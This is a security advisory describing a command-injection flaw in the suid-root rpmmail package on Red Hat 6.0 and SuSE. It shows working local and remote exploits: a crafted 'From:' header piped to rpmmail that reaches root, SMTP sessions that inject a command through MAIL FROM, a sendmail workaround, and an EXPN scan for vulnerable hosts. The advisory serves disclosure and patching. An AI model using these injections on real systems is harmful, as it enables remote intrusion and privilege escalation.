COMMAND
rpmmail
SYSTEMS AFFECTED
RedHat 6.0, SuSE
PROBLEM
Brock Tellier found following. A vulnerability exists in the
rpmmail package distributed on the Red Hat 6.0 Extra Applications
CD. The potential compromise for this bug could be remote or
local root or simply remote command execution as "nobody" or
similar, depending on your system configuration.
By sending a carefully crafted mail message to
rpmmail@vulnerablehost, you can get /home/rpmmail/rpmmail (suid
root by default, exec'd by .forward remotely) to system(3) any
command you wish. The command executed does not necessarily have
root privs because of bash's handling of euid != uid of caller.
Although system(3) calls /bin/sh -c, it is linked by default (can
anyone verify these?) on some Linux systems, such as SuSE 6.2, to
/bin/bash v2. From the system(3) man page:
system() will not, in fact, work properly from programs with
suid or sgid privileges on systems on which /bin/sh is bash
version 2, since bash 2 drops privileges on startup.
(Debian uses a modified bash which does not do this when
invoked as sh.)
Thus some systems with rpmmail installed are vulnerable to
local/remote root, all others to remote command execution as an
unpriv'd user. The local exploit as follows:
/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$
After linking /bin/sh to /bin/ksh instead:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$
The remote exploit is merely:
bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Btw, without domain, this won't work with sendmail. So, here's
the trick:
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok
A remote scan of vulnerable hosts for this problem would be simple
as well, since EXPN can be used to verify the existence of the
.forward file:
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"
SOLUTION
This was fixed and new versions is available on FTP site:
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
or
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm
Btw, rpmmail is distributed on the RH6.0 Extra Applications CD.
You can, of course, install rpmmail on any other linux variant,
such as SuSE, which is what is did above.